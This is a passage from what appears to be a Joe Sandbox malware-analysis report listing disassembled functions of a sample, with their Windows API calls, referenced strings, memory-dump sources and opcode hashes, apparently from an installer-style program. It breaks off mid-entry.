                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                              • API String ID: 142928637-2676053874
                                                              • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                              • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                              • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                              • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                              Function 0044C7DC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                              • API String ID: 2238633743-1050967733
                                                              • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                              • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                              • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                              • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                              Function 00478C20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                              • API String ID: 667068680-222143506
                                                              • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                              • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                              • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                              • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                              Function 0041B508 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFocus.USER32 ref: 0041B57E
                                                              • GetDC.USER32(?), ref: 0041B58A
                                                              • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                              • ReleaseDC.USER32(?,?), ref: 0041B626
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                              • String ID:
                                                              • API String ID: 2502006586-0
                                                              • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                              • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                              • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                              • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                              Function 0045D04C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                              • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                              • API String ID: 1452528299-1580325520
                                                              • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                              • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                              • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                              • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                              Function 0041BD8C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                              • GetDC.USER32(00000000), ref: 0041BDE9
                                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystem$Release
                                                              • String ID:
                                                              • API String ID: 447804332-0
                                                              • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                              • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                              • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                              • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                              Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                              • LocalFree.KERNEL32(0069EBD0,00000000,00401B68), ref: 00401ACF
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,0069EBD0,00000000,00401B68), ref: 00401AEE
                                                              • LocalFree.KERNEL32(0069FBD0,?,00000000,00008000,0069EBD0,00000000,00401B68), ref: 00401B2D
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                              • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                              • String ID:
                                                              • API String ID: 3782394904-0
                                                              • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                              • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                              • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                              • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                              Function 0047E758 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$Show
                                                              • String ID:
                                                              • API String ID: 3609083571-0
                                                              • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                              • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                              • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                              • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                              Function 0041B270 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                              • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                              • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                              • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                              • String ID:
                                                              • API String ID: 3527656728-0
                                                              • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                              • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                              • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                              • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                              Function 004538BC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle
                                                              • String ID: !nI$.tmp$_iu
                                                              • API String ID: 3498533004-584216493
                                                              • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                              • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                              • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                              • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                              Function 00497D5C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                              • API String ID: 3312786188-1660910688
                                                              • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                              • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                              • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                              • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                              Function 0042EAA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                              • API String ID: 828529508-2866557904
                                                              • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                              • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                              • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                              • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                              Function 00457FF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                              • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                              • API String ID: 2573145106-3235461205
                                                              • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                              • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                              • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                              • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                              Function 0042E9AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                              • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                              • API String ID: 3478007392-2498399450
                                                              • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                              • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                              • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                              • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                              Function 00477B94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                              • API String ID: 1782028327-3855017861
                                                              • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                              • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                              • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                              • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                              Function 00416C2C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                              • SaveDC.GDI32(?), ref: 00416C83
                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
